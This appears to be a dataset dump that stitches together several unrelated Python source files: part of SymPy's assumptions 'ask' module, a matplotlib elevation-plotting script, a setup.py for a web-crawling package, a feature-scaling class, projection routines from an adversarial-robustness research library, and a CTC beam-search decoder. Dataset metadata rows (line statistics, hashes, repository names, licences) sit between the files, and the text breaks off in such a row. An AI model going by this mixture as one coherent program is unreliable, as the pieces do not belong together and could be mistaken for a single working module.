def _extract_facts(expr, symbol, check_reversed_rel=True):
"""
Helper for ask().
Extracts the facts relevant to the symbol from an assumption.
Returns None if there is nothing to extract.
"""
if isinstance(symbol, Relational):
if check_reversed_rel:
rev = _extract_facts(expr, symbol.reversed, False)
if rev is not None:
return rev
if isinstance(expr, bool):
return
if not expr.has(symbol):
return
if isinstance(expr, AppliedPredicate):
if expr.arg == symbol:
return expr.func
else:
return
if isinstance(expr, Not) and expr.args[0].func in (And, Or):
cls = Or if expr.args[0] == And else And
expr = cls(*[~arg for arg in expr.args[0].args])
args = [_extract_facts(arg, symbol) for arg in expr.args]
if isinstance(expr, And):
args = [x for x in args if x is not None]
if args:
return expr.func(*args)
if args and all(x is not None for x in args):
return expr.func(*args)
def ask(proposition, assumptions=True, context=global_assumptions):
"""
Method for inferring properties about objects.
**Syntax**
* ask(proposition)
* ask(proposition, assumptions)
where ``proposition`` is any boolean expression
Examples
========
>>> from sympy import ask, Q, pi
>>> from sympy.abc import x, y
>>> ask(Q.rational(pi))
False
>>> ask(Q.even(x*y), Q.even(x) & Q.integer(y))
True
>>> ask(Q.prime(4*x), Q.integer(x))
False
**Remarks**
Relations in assumptions are not implemented (yet), so the following
will not give a meaningful result.
>>> ask(Q.positive(x), Q.is_true(x > 0)) # doctest: +SKIP
It is however a work in progress.
"""
from sympy.assumptions.satask import satask
if not isinstance(proposition, (BooleanFunction, AppliedPredicate, bool, BooleanAtom)):
raise TypeError("proposition must be a valid logical expression")
if not isinstance(assumptions, (BooleanFunction, AppliedPredicate, bool, BooleanAtom)):
raise TypeError("assumptions must be a valid logical expression")
if isinstance(proposition, AppliedPredicate):
key, expr = proposition.func, sympify(proposition.arg)
else:
key, expr = Q.is_true, sympify(proposition)
assumptions = And(assumptions, And(*context))
assumptions = to_cnf(assumptions)
local_facts = _extract_facts(assumptions, expr)
known_facts_cnf = get_known_facts_cnf()
known_facts_dict = get_known_facts_dict()
if local_facts and satisfiable(And(local_facts, known_facts_cnf)) is False:
raise ValueError("inconsistent assumptions %s" % assumptions)
# direct resolution method, no logic
res = key(expr)._eval_ask(assumptions)
if res is not None:
return bool(res)
if local_facts is None:
return satask(proposition, assumptions=assumptions, context=context)
# See if there's a straight-forward conclusion we can make for the inference
if local_facts.is_Atom:
if key in known_facts_dict[local_facts]:
return True
if Not(key) in known_facts_dict[local_facts]:
return False
elif (local_facts.func is And and
all(k in known_facts_dict for k in local_facts.args)):
for assum in local_facts.args:
if assum.is_Atom:
if key in known_facts_dict[assum]:
return True
if Not(key) in known_facts_dict[assum]:
return False
elif assum.func is Not and assum.args[0].is_Atom:
if key in known_facts_dict[assum]:
return False
if Not(key) in known_facts_dict[assum]:
return True
elif (isinstance(key, Predicate) and
local_facts.func is Not and local_facts.args[0].is_Atom):
if local_facts.args[0] in known_facts_dict[key]:
return False
# Failing all else, we do a full logical inference
res = ask_full_inference(key, local_facts, known_facts_cnf)
if res is None:
return satask(proposition, assumptions=assumptions, context=context)
return res
def ask_full_inference(proposition, assumptions, known_facts_cnf):
"""
Method for inferring properties about objects.
"""
if not satisfiable(And(known_facts_cnf, assumptions, proposition)):
return False
if not satisfiable(And(known_facts_cnf, assumptions, Not(proposition))):
return True
return None
def register_handler(key, handler):
"""
Register a handler in the ask system. key must be a string and handler a
class inheriting from AskHandler::
>>> from sympy.assumptions import register_handler, ask, Q
>>> from sympy.assumptions.handlers import AskHandler
>>> class MersenneHandler(AskHandler):
... # Mersenne numbers are in the form 2**n + 1, n integer
... @staticmethod
... def Integer(expr, assumptions):
... from sympy import log
... return ask(Q.integer(log(expr + 1, 2)))
>>> register_handler('mersenne', MersenneHandler)
>>> ask(Q.mersenne(7))
True
"""
if type(key) is Predicate:
key = key.name
try:
getattr(Q, key).add_handler(handler)
except AttributeError:
setattr(Q, key, Predicate(key, handlers=[handler]))
def remove_handler(key, handler):
"""Removes a handler from the ask system. Same syntax as register_handler"""
if type(key) is Predicate:
key = key.name
getattr(Q, key).remove_handler(handler)
def single_fact_lookup(known_facts_keys, known_facts_cnf):
# Compute the quick lookup for single facts
mapping = {}
for key in known_facts_keys:
mapping[key] = {key}
for other_key in known_facts_keys:
if other_key != key:
if ask_full_inference(other_key, key, known_facts_cnf):
mapping[key].add(other_key)
return mapping
def compute_known_facts(known_facts, known_facts_keys):
"""Compute the various forms of knowledge compilation used by the
assumptions system.
This function is typically applied to the results of the ``get_known_facts``
and ``get_known_facts_keys`` functions defined at the bottom of
this file.
"""
from textwrap import dedent, wrap
fact_string = dedent('''\
"""
The contents of this file are the return value of
``sympy.assumptions.ask.compute_known_facts``.
Do NOT manually edit this file.
Instead, run ./bin/ask_update.py.
"""
from sympy.core.cache import cacheit
from sympy.logic.boolalg import And, Not, Or
from sympy.assumptions.ask import Q
# -{ Known facts in Conjunctive Normal Form }-
@cacheit
def get_known_facts_cnf():
return And(
%s
)
# -{ Known facts in compressed sets }-
@cacheit
def get_known_facts_dict():
return {
%s
}
''')
# Compute the known facts in CNF form for logical inference
LINE = ",\n "
HANG = ' '*8
cnf = to_cnf(known_facts)
c = LINE.join([str(a) for a in cnf.args])
mapping = single_fact_lookup(known_facts_keys, cnf)
items = sorted(mapping.items(), key=str)
keys = [str(i[0]) for i in items]
values = ['set(%s)' % sorted(i[1], key=str) for i in items]
m = LINE.join(['\n'.join(
wrap("%s: %s" % (k, v),
subsequent_indent=HANG,
break_long_words=False))
for k, v in zip(keys, values)]) + ','
return fact_string % (c, m)
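# Illustrative sketch (assumption): combining compute_known_facts with the two
# helpers defined at the bottom of this module to regenerate the cached fact
# file, mirroring what ./bin/ask_update.py is described as doing above. The
# output path is an assumed example, not necessarily the real target file.
def _regenerate_known_facts_sketch(path='ask_generated_example.py'):
    fact_code = compute_known_facts(get_known_facts(), get_known_facts_keys())
    with open(path, 'w') as f:
        f.write(fact_code)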
# handlers tells us what ask handler we should use
# for a particular key
_val_template = 'sympy.assumptions.handlers.%s'
_handlers = [
("antihermitian", "sets.AskAntiHermitianHandler"),
("finite", "calculus.AskFiniteHandler"),
("commutative", "AskCommutativeHandler"),
("complex", "sets.AskComplexHandler"),
("composite", "ntheory.AskCompositeHandler"),
("even", "ntheory.AskEvenHandler"),
("extended_real", "sets.AskExtendedRealHandler"),
("hermitian", "sets.AskHermitianHandler"),
("imaginary", "sets.AskImaginaryHandler"),
("integer", "sets.AskIntegerHandler"),
("irrational", "sets.AskIrrationalHandler"),
("rational", "sets.AskRationalHandler"),
("negative", "order.AskNegativeHandler"),
("nonzero", "order.AskNonZeroHandler"),
("nonpositive", "order.AskNonPositiveHandler"),
("nonnegative", "order.AskNonNegativeHandler"),
("zero", "order.AskZeroHandler"),
("positive", "order.AskPositiveHandler"),
("prime", "ntheory.AskPrimeHandler"),
("real", "sets.AskRealHandler"),
("odd", "ntheory.AskOddHandler"),
("algebraic", "sets.AskAlgebraicHandler"),
("is_true", "common.TautologicalHandler"),
("symmetric", "matrices.AskSymmetricHandler"),
("invertible", "matrices.AskInvertibleHandler"),
("orthogonal", "matrices.AskOrthogonalHandler"),
("unitary", "matrices.AskUnitaryHandler"),
("positive_definite", "matrices.AskPositiveDefiniteHandler"),
("upper_triangular", "matrices.AskUpperTriangularHandler"),
("lower_triangular", "matrices.AskLowerTriangularHandler"),
("diagonal", "matrices.AskDiagonalHandler"),
("fullrank", "matrices.AskFullRankHandler"),
("square", "matrices.AskSquareHandler"),
("integer_elements", "matrices.AskIntegerElementsHandler"),
("real_elements", "matrices.AskRealElementsHandler"),
("complex_elements", "matrices.AskComplexElementsHandler"),
]
for name, value in _handlers:
register_handler(name, _val_template % value)
@cacheit
def get_known_facts_keys():
return [
getattr(Q, attr)
for attr in Q.__class__.__dict__
if not (attr.startswith('__') or
attr in deprecated_predicates)]
@cacheit
def get_known_facts():
return And(
Implies(Q.infinite, ~Q.finite),
Implies(Q.real, Q.complex),
Implies(Q.real, Q.hermitian),
Equivalent(Q.extended_real, Q.real | Q.infinite),
Equivalent(Q.even | Q.odd, Q.integer),
Implies(Q.even, ~Q.odd),
Equivalent(Q.prime, Q.integer & Q.positive & ~Q.composite),
Implies(Q.integer, Q.rational),
Implies(Q.rational, Q.algebraic),
Implies(Q.algebraic, Q.complex),
Equivalent(Q.transcendental | Q.algebraic, Q.complex),
Implies(Q.transcendental, ~Q.algebraic),
Implies(Q.imaginary, Q.complex & ~Q.real),
Implies(Q.imaginary, Q.antihermitian),
Implies(Q.antihermitian, ~Q.hermitian),
Equivalent(Q.irrational | Q.rational, Q.real),
Implies(Q.irrational, ~Q.rational),
Implies(Q.zero, Q.even),
Equivalent(Q.real, Q.negative | Q.zero | Q.positive),
Implies(Q.zero, ~Q.negative & ~Q.positive),
Implies(Q.negative, ~Q.positive),
Equivalent(Q.nonnegative, Q.zero | Q.positive),
Equivalent(Q.nonpositive, Q.zero | Q.negative),
Equivalent(Q.nonzero, Q.negative | Q.positive),
Implies(Q.orthogonal, Q.positive_definite),
Implies(Q.orthogonal, Q.unitary),
Implies(Q.unitary & Q.real, Q.orthogonal),
Implies(Q.unitary, Q.normal),
Implies(Q.unitary, Q.invertible),
Implies(Q.normal, Q.square),
Implies(Q.diagonal, Q.normal),
Implies(Q.positive_definite, Q.invertible),
Implies(Q.diagonal, Q.upper_triangular),
Implies(Q.diagonal, Q.lower_triangular),
Implies(Q.lower_triangular, Q.triangular),
Implies(Q.upper_triangular, Q.triangular),
Implies(Q.triangular, Q.upper_triangular | Q.lower_triangular),
Implies(Q.upper_triangular & Q.lower_triangular, Q.diagonal),
Implies(Q.diagonal, Q.symmetric),
Implies(Q.unit_triangular, Q.triangular),
Implies(Q.invertible, Q.fullrank),
Implies(Q.invertible, Q.square),
Implies(Q.symmetric, Q.square),
Implies(Q.fullrank & Q.square, Q.invertible),
Equivalent(Q.invertible, ~Q.singular),
Implies(Q.integer_elements, Q.real_elements),
Implies(Q.real_elements, Q.complex_elements),
)
from sympy.assumptions.ask_generated import (
get_known_facts_dict, get_known_facts_cnf)
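# Typical entry-point usage of this module (a small sketch; see also the
# doctest in register_handler above):
#
#     >>> from sympy import Symbol
#     >>> x = Symbol('x', positive=True)
#     >>> ask(Q.real(x))
#     True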
| 28.446405
| 91
| 0.557039
|
14b776ff88ac69dbffe34ddd9d6ea4bdc4f4b1ee
| 1,479
|
py
|
Python
|
scripts/plot_europe.py
|
MaxNoe/soak19
|
76ebffe8290118a7bb0a927d87a66e6664c0b4c8
|
[
"MIT"
] | 1
|
2020-11-24T19:07:55.000Z
|
2020-11-24T19:07:55.000Z
|
scripts/plot_europe.py
|
maxnoe/soak19
|
76ebffe8290118a7bb0a927d87a66e6664c0b4c8
|
[
"MIT"
] | null | null | null |
scripts/plot_europe.py
|
maxnoe/soak19
|
76ebffe8290118a7bb0a927d87a66e6664c0b4c8
|
[
"MIT"
] | null | null | null |
import xarray
import matplotlib.pyplot as plt
from matplotlib.colors import LinearSegmentedColormap, DivergingNorm
# note: DivergingNorm was renamed to TwoSlopeNorm in later Matplotlib releases
import numpy as np
dataset = xarray.open_dataset('data/ETOPO1_Ice_g_gdal.grd')
shape = tuple(dataset.dimension.values[::-1])
z = dataset.z.values.reshape(shape)
lon1 = -22
lon2 = 45
lat1 = 30
lat2 = 75
idx2 = int(-lat1 / 180 * shape[0]) + shape[0] // 2
idx1 = int(-lat2 / 180 * shape[0]) + shape[0] // 2
idx3 = int(lon1 / 360 * shape[1]) + shape[1] // 2
idx4 = int(lon2 / 360 * shape[1]) + shape[1] // 2
print(idx1, idx2, idx3, idx4)
z = z[idx1:idx2, idx3:idx4]
print(z.min(), z.max())
fig = plt.figure(constrained_layout=True)
ax = fig.add_subplot(1, 1, 1)
ax.set_axis_off()
img = plt.imshow(
z,
cmap='jet',
vmin=-5e3,
vmax=5e3,
# extent=[-180, 180, -90, 90]
)
img.set_rasterized(True)
fig.colorbar(img)
fig.savefig('build/plots/europe_jet.pdf')
colors_undersea = plt.cm.terrain(np.linspace(0, 0.17, 256))
colors_land = plt.cm.terrain(np.linspace(0.25, 1, 256))
all_colors = np.vstack((colors_undersea, colors_land))
terrain_map = LinearSegmentedColormap.from_list('terrain_map', all_colors)
divnorm = DivergingNorm(vmin=-5e3, vcenter=0, vmax=5e3)
fig = plt.figure(constrained_layout=True)
ax = fig.add_subplot(1, 1, 1)
ax.set_axis_off()
img = plt.imshow(
z,
cmap=terrain_map,
norm=divnorm,
# extent=[-180, 180, -90, 90]
)
img.set_rasterized(True)
fig.colorbar(img)
fig.savefig('build/plots/europe_divnorm.pdf')
| 23.109375
| 74
| 0.691007
|
e781a9572985e96058c6f383e5e8534ff2647249
| 1,648
|
py
|
Python
|
setup.py
|
INNOVINATI/microwler
|
958430d1804f4c29e07bfdd8dccab369d5bbda3e
|
[
"MIT"
] | 11
|
2021-01-12T14:45:12.000Z
|
2022-02-09T02:09:00.000Z
|
setup.py
|
INNOVINATI/microwler
|
958430d1804f4c29e07bfdd8dccab369d5bbda3e
|
[
"MIT"
] | null | null | null |
setup.py
|
INNOVINATI/microwler
|
958430d1804f4c29e07bfdd8dccab369d5bbda3e
|
[
"MIT"
] | null | null | null |
from setuptools import setup, find_packages
import pathlib
here = pathlib.Path(__file__).parent.resolve()
long_description = (here / 'README.md').read_text(encoding='utf-8')
setup(
name='microwler',
version='0.1.8',
description='A micro-framework for asynchronous deep crawls and web scraping written in Python',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://innovinati.github.io/microwler/',
author='Maximilian Wolf',
author_email='maximilian.wolf@innovinati.com',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Framework :: AsyncIO',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3 :: Only',
],
packages=['microwler', 'microwler.cli', 'microwler.web'],
include_package_data=True,
python_requires='>=3.7, <4',
install_requires=[
'aiohttp', 'lxml', 'diskcache', 'prettytable', 'quart',
'random-user-agent', 'html-text', 'completely', 'click',
'parsel', 'chardet', 'quart-cors', 'aiodns'
],
entry_points='''
[console_scripts]
microwler=microwler.cli.cmd:show_help
new=microwler.cli.cmd:add_project
crawler=microwler.cli.cmd:crawler
serve=microwler.cli.cmd:start_server
''',
project_urls={
'Issues': 'https://github.com/INNOVINATI/microwler/issues',
'Source': 'https://github.com/INNOVINATI/microwler/',
},
)
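# A minimal local-development sketch (assumed workflow, not part of the package
# metadata above):
#
#     pip install -e .
#     microwler        # console script registered above; prints the CLI help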
| 35.06383
| 100
| 0.649879
|
60fdfddd8a4d0bfd39fdce4f9733537cba69ac06
| 824
|
py
|
Python
|
src/extractors/featurecombiner.py
|
safdark/advanced-lane-lines
|
27edcc444ac532e84749d667fc579970d2059aff
|
[
"Apache-2.0"
] | null | null | null |
src/extractors/featurecombiner.py
|
safdark/advanced-lane-lines
|
27edcc444ac532e84749d667fc579970d2059aff
|
[
"Apache-2.0"
] | 6
|
2017-01-01T12:12:57.000Z
|
2017-01-06T03:40:49.000Z
|
src/extractors/featurecombiner.py
|
safdark/advanced-lane-lines
|
27edcc444ac532e84749d667fc579970d2059aff
|
[
"Apache-2.0"
] | null | null | null |
'''
Created on Jan 14, 2017
@author: safdar
'''
import numpy as np
from sklearn.preprocessing import StandardScaler  # public import path; sklearn.preprocessing.data is a private module
class FeatureCombiner(object):
def __init__(self, extractors):
self.__extractors__ = extractors
def extract(self, image):
featurelist = []
for extractor in self.__extractors__:
feature = extractor.extract(image)
assert feature is not None, "Feature obtained from {} was none".format(extractor.__class__.__name__)
featurelist.append(feature)
features = np.concatenate(tuple(featurelist))
scaled_features = StandardScaler().fit_transform(features.reshape(-1,1))
#scaled_features = scaled_features.reshape(1, -1)
scaled_features = scaled_features.ravel()
return scaled_features
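# A minimal usage sketch. MeanChannelExtractor is hypothetical -- any object
# exposing extract(image) and returning a 1-D array would work here:
#
#     class MeanChannelExtractor(object):
#         def extract(self, image):
#             return image.mean(axis=(0, 1))  # one value per colour channel
#
#     combiner = FeatureCombiner([MeanChannelExtractor()])
#     feature_vector = combiner.extract(image)  # concatenated, scaled, flattened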
| 32.96
| 112
| 0.675971
|
a74c32c0ee5f1bd8755fe2e955590d6c96a833ba
| 5,203
|
py
|
Python
|
adv_lib/attacks/fast_adaptive_boundary/projections.py
|
Daulbaev/adversarial-library
|
6f979a511ad78908374cd55855a9e2c5a874be7d
|
[
"BSD-3-Clause"
] | 55
|
2020-11-25T10:47:48.000Z
|
2022-03-21T12:11:31.000Z
|
adv_lib/attacks/fast_adaptive_boundary/projections.py
|
Daulbaev/adversarial-library
|
6f979a511ad78908374cd55855a9e2c5a874be7d
|
[
"BSD-3-Clause"
] | 4
|
2021-03-10T19:25:31.000Z
|
2021-08-06T00:10:49.000Z
|
adv_lib/attacks/fast_adaptive_boundary/projections.py
|
Daulbaev/adversarial-library
|
6f979a511ad78908374cd55855a9e2c5a874be7d
|
[
"BSD-3-Clause"
] | 8
|
2020-11-26T08:42:04.000Z
|
2022-01-13T02:55:47.000Z
|
import math
import torch
from torch import Tensor
from torch.nn import functional as F
def projection_l1(points_to_project: Tensor, w_hyperplane: Tensor, b_hyperplane: Tensor) -> Tensor:
    """Batched perturbation of minimal l1 norm moving each point onto the
    hyperplane <w, x> = b while keeping the result inside the [0, 1] box
    (or as close to the hyperplane as the box constraint allows)."""
device = points_to_project.device
t, w, b = points_to_project, w_hyperplane.clone(), b_hyperplane
c = (w * t).sum(1) - b
ind2 = 2 * (c >= 0) - 1
w.mul_(ind2.unsqueeze(1))
c.mul_(ind2)
r = (1 / w).abs().clamp_max(1e12)
indr = torch.argsort(r, dim=1)
indr_rev = torch.argsort(indr)
c6 = (w < 0).float()
d = (-t + c6) * (w != 0).float()
ds = torch.min(-w * t, w * (1 - t)).gather(1, indr)
ds2 = torch.cat((c.unsqueeze(-1), ds), 1)
s = torch.cumsum(ds2, dim=1)
c2 = s[:, -1] < 0
lb = torch.zeros(c2.sum(), device=device)
ub = torch.full_like(lb, s.shape[1])
nitermax = math.ceil(math.log2(w.shape[1]))
s_ = s[c2]
for counter in range(nitermax):
counter4 = torch.floor((lb + ub) / 2)
counter2 = counter4.long().unsqueeze(1)
c3 = s_.gather(1, counter2).squeeze(1) > 0
lb = torch.where(c3, counter4, lb)
ub = torch.where(c3, ub, counter4)
lb2 = lb.long()
if c2.any():
indr = indr[c2].gather(1, lb2.unsqueeze(1)).squeeze(1)
u = torch.arange(0, w.shape[0], device=device).unsqueeze(1)
u2 = torch.arange(0, w.shape[1], device=device, dtype=torch.float).unsqueeze(0)
alpha = -s[c2, lb2] / w[c2, indr]
c5 = u2 < lb.unsqueeze(-1)
u3 = c5[u[:c5.shape[0]], indr_rev[c2]]
d[c2] = d[c2] * u3.float()
d[c2, indr] = alpha
return d * (w.abs() > 1e-8).float()
def projection_l2(points_to_project: Tensor, w_hyperplane: Tensor, b_hyperplane: Tensor) -> Tensor:
    """Batched perturbation of minimal l2 norm moving each point onto the
    hyperplane <w, x> = b while keeping the result inside the [0, 1] box
    (or as close to the hyperplane as the box constraint allows)."""
device = points_to_project.device
t, w, b = points_to_project, w_hyperplane.clone(), b_hyperplane
c = (w * t).sum(1) - b
ind2 = 2 * (c >= 0) - 1
w.mul_(ind2.unsqueeze(1))
c.mul_(ind2)
r = torch.max(t / w, (t - 1) / w).clamp(min=-1e12, max=1e12)
r.masked_fill_(w.abs() < 1e-8, 1e12)
r[r == -1e12] *= -1
rs, indr = torch.sort(r, dim=1)
rs2 = F.pad(rs[:, 1:], (0, 1))
rs.masked_fill_(rs == 1e12, 0)
rs2.masked_fill_(rs2 == 1e12, 0)
w3s = (w ** 2).gather(1, indr)
w5 = w3s.sum(dim=1, keepdim=True)
ws = w5 - torch.cumsum(w3s, dim=1)
d = -(r * w)
d.mul_((w.abs() > 1e-8).float())
s = torch.cat((-w5 * rs[:, 0:1], torch.cumsum((-rs2 + rs) * ws, dim=1) - w5 * rs[:, 0:1]), 1)
c4 = s[:, 0] + c < 0
c3 = (d * w).sum(dim=1) + c > 0
c2 = ~(c4 | c3)
lb = torch.zeros(c2.sum(), device=device)
ub = torch.full_like(lb, w.shape[1] - 1)
nitermax = math.ceil(math.log2(w.shape[1]))
s_, c_ = s[c2], c[c2]
for counter in range(nitermax):
counter4 = torch.floor((lb + ub) / 2)
counter2 = counter4.long().unsqueeze(1)
c3 = s_.gather(1, counter2).squeeze(1) + c_ > 0
lb = torch.where(c3, counter4, lb)
ub = torch.where(c3, ub, counter4)
lb = lb.long()
if c4.any():
alpha = c[c4] / w5[c4].squeeze(-1)
d[c4] = -alpha.unsqueeze(-1) * w[c4]
if c2.any():
alpha = (s[c2, lb] + c[c2]) / ws[c2, lb] + rs[c2, lb]
alpha[ws[c2, lb] == 0] = 0
c5 = (alpha.unsqueeze(-1) > r[c2]).float()
d[c2] = d[c2] * c5 - alpha.unsqueeze(-1) * w[c2] * (1 - c5)
return d * (w.abs() > 1e-8).float()
def projection_linf(points_to_project: Tensor, w_hyperplane: Tensor, b_hyperplane: Tensor) -> Tensor:
    """Batched perturbation of minimal l-infinity norm moving each point onto
    the hyperplane <w, x> = b while keeping the result inside the [0, 1] box
    (or as close to the hyperplane as the box constraint allows)."""
device = points_to_project.device
t, w, b = points_to_project, w_hyperplane.clone(), b_hyperplane.clone()
sign = 2 * ((w * t).sum(1) - b >= 0) - 1
w.mul_(sign.unsqueeze(1))
b.mul_(sign)
a = (w < 0).float()
d = (a - t) * (w != 0).float()
p = a - t * (2 * a - 1)
indp = torch.argsort(p, dim=1)
b = b - (w * t).sum(1)
b0 = (w * d).sum(1)
indp2 = indp.flip((1,))
ws = w.gather(1, indp2)
bs2 = - ws * d.gather(1, indp2)
s = torch.cumsum(ws.abs(), dim=1)
sb = torch.cumsum(bs2, dim=1) + b0.unsqueeze(1)
b2 = sb[:, -1] - s[:, -1] * p.gather(1, indp[:, 0:1]).squeeze(1)
c_l = b - b2 > 0
c2 = (b - b0 > 0) & (~c_l)
lb = torch.zeros(c2.sum(), device=device)
ub = torch.full_like(lb, w.shape[1] - 1)
nitermax = math.ceil(math.log2(w.shape[1]))
indp_, sb_, s_, p_, b_ = indp[c2], sb[c2], s[c2], p[c2], b[c2]
for counter in range(nitermax):
counter4 = torch.floor((lb + ub) / 2)
counter2 = counter4.long().unsqueeze(1)
indcurr = indp_.gather(1, indp_.size(1) - 1 - counter2)
b2 = (sb_.gather(1, counter2) - s_.gather(1, counter2) * p_.gather(1, indcurr)).squeeze(1)
c = b_ - b2 > 0
lb = torch.where(c, counter4, lb)
ub = torch.where(c, ub, counter4)
lb = lb.long()
if c_l.any():
lmbd_opt = torch.clamp_min((b[c_l] - sb[c_l, -1]) / (-s[c_l, -1]), min=0).unsqueeze(-1)
d[c_l] = (2 * a[c_l] - 1) * lmbd_opt
lmbd_opt = torch.clamp_min((b[c2] - sb[c2, lb]) / (-s[c2, lb]), min=0).unsqueeze(-1)
d[c2] = torch.min(lmbd_opt, d[c2]) * a[c2] + torch.max(-lmbd_opt, d[c2]) * (1 - a[c2])
return d * (w != 0).float()
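# A minimal usage sketch (shapes assumed from the code above: a batch of N
# points in [0, 1]^D and one hyperplane <w_i, x> = b_i per point; each function
# returns the perturbation to add to the points):
#
#     if __name__ == '__main__':
#         torch.manual_seed(0)
#         N, D = 4, 10
#         t, w, b = torch.rand(N, D), torch.randn(N, D), torch.randn(N)
#         for proj in (projection_l1, projection_l2, projection_linf):
#             d = proj(t, w, b)
#             x = t + d                      # projected points
#             print(proj.__name__, ((w * x).sum(1) - b).abs().max().item())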
| 31.72561
| 101
| 0.540265
|
86530cd49650d8b0ce33c2bc39be5879d637445f
| 6,639
|
py
|
Python
|
ocr/utils/beam_search.py
|
vee51/Hand
|
eae25f189e7561d5b386511e11de2b9cec29b7a5
|
[
"Apache-2.0"
] | 435
|
2019-03-16T21:45:56.000Z
|
2022-03-25T09:14:22.000Z
|
ocr/utils/beam_search.py
|
freedom9393/handwritten-text-recognition-for-apache-mxnet
|
bf7b6297747c794046665c682d04a153aaec20dd
|
[
"Apache-2.0"
] | 60
|
2019-03-19T05:53:40.000Z
|
2022-03-31T12:27:48.000Z
|
ocr/utils/beam_search.py
|
freedom9393/handwritten-text-recognition-for-apache-mxnet
|
bf7b6297747c794046665c682d04a153aaec20dd
|
[
"Apache-2.0"
] | 220
|
2019-03-17T10:06:06.000Z
|
2022-03-15T14:13:39.000Z
|
# From https://github.com/githubharald/CTCDecoder
#
#MIT License
#Copyright (c) 2018 Harald Scheidl
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
from __future__ import division
from __future__ import print_function
import numpy as np
class BeamEntry:
"information about one single beam at specific time-step"
def __init__(self):
self.prTotal = 0 # blank and non-blank
self.prNonBlank = 0 # non-blank
self.prBlank = 0 # blank
self.prText = 1 # LM score
self.lmApplied = False # flag if LM was already applied to this beam
self.labeling = () # beam-labeling
class BeamState:
"information about the beams at specific time-step"
def __init__(self):
self.entries = {}
def norm(self):
"length-normalise LM score"
for (k, _) in self.entries.items():
labelingLen = len(self.entries[k].labeling)
self.entries[k].prText = self.entries[k].prText ** (1.0 / (labelingLen if labelingLen else 1.0))
def sort(self):
"return beam-labelings, sorted by probability"
beams = [v for (_, v) in self.entries.items()]
sortedBeams = sorted(beams, reverse=True, key=lambda x: x.prTotal*x.prText)
return [x.labeling for x in sortedBeams]
def applyLM(parentBeam, childBeam, classes, lm):
"calculate LM score of child beam by taking score from parent beam and bigram probability of last two chars"
if lm and not childBeam.lmApplied:
c1 = classes[parentBeam.labeling[-1] if parentBeam.labeling else classes.index(' ')] # first char
c2 = classes[childBeam.labeling[-1]] # second char
lmFactor = 0.01 # influence of language model
bigramProb = lm.getCharBigram(c1, c2) ** lmFactor # probability of seeing first and second char next to each other
childBeam.prText = parentBeam.prText * bigramProb # probability of char sequence
childBeam.lmApplied = True # only apply LM once per beam entry
def addBeam(beamState, labeling):
"add beam if it does not yet exist"
if labeling not in beamState.entries:
beamState.entries[labeling] = BeamEntry()
def ctcBeamSearch(mat, classes, lm, beamWidth):
"beam search as described by the paper of Hwang et al. and the paper of Graves et al."
blankIdx = len(classes)
maxT, maxC = mat.shape
# initialise beam state
last = BeamState()
labeling = ()
last.entries[labeling] = BeamEntry()
last.entries[labeling].prBlank = 1
last.entries[labeling].prTotal = 1
# go over all time-steps
for t in range(maxT):
curr = BeamState()
# get beam-labelings of best beams
bestLabelings = last.sort()[0:beamWidth]
# go over best beams
for labeling in bestLabelings:
# probability of paths ending with a non-blank
prNonBlank = 0
# in case of non-empty beam
if labeling:
# probability of paths with repeated last char at the end
try:
prNonBlank = last.entries[labeling].prNonBlank * mat[t, labeling[-1]]
except FloatingPointError:
prNonBlank = 0
# probability of paths ending with a blank
prBlank = (last.entries[labeling].prTotal) * mat[t, blankIdx]
# add beam at current time-step if needed
addBeam(curr, labeling)
# fill in data
curr.entries[labeling].labeling = labeling
curr.entries[labeling].prNonBlank += prNonBlank
curr.entries[labeling].prBlank += prBlank
curr.entries[labeling].prTotal += prBlank + prNonBlank
curr.entries[labeling].prText = last.entries[labeling].prText # beam-labeling not changed, therefore also LM score unchanged from
curr.entries[labeling].lmApplied = True # LM already applied at previous time-step for this beam-labeling
# extend current beam-labeling
for c in range(maxC - 1):
# add new char to current beam-labeling
newLabeling = labeling + (c,)
# if new labeling contains duplicate char at the end, only consider paths ending with a blank
if labeling and labeling[-1] == c:
prNonBlank = mat[t, c] * last.entries[labeling].prBlank
else:
prNonBlank = mat[t, c] * last.entries[labeling].prTotal
# add beam at current time-step if needed
addBeam(curr, newLabeling)
# fill in data
curr.entries[newLabeling].labeling = newLabeling
curr.entries[newLabeling].prNonBlank += prNonBlank
curr.entries[newLabeling].prTotal += prNonBlank
# apply LM
applyLM(curr.entries[labeling], curr.entries[newLabeling], classes, lm)
# set new beam state
last = curr
# normalise LM scores according to beam-labeling-length
last.norm()
# sort by probability
bestLabelings = last.sort()[:beamWidth] # get most probable labeling
output = []
for bestLabeling in bestLabelings:
# map labels to chars
res = ''
for l in bestLabeling:
res += classes[l]
output.append(res)
return output
def testBeamSearch():
"test decoder"
classes = 'ab'
mat = np.array([[0.4, 0, 0.6], [0.4, 0, 0.6]])
print('Test beam search')
expected = 'a'
    actual = ctcBeamSearch(mat, classes, None, beamWidth=2)[0]  # beam width is required here; take the most probable labeling
print('Expected: "' + expected + '"')
print('Actual: "' + actual + '"')
print('OK' if expected == actual else 'ERROR')
if __name__ == '__main__':
testBeamSearch()
| 39.052941
| 141
| 0.654918
|
9aef3969df6b62774222adcb30e4ed59bff176bc
| 769
|
py
|
Python
|
src/oci/waas/__init__.py
|
LaudateCorpus1/oci-python-sdk
|
b0d3ce629d5113df4d8b83b7a6502b2c5bfa3015
|
[
"Apache-2.0",
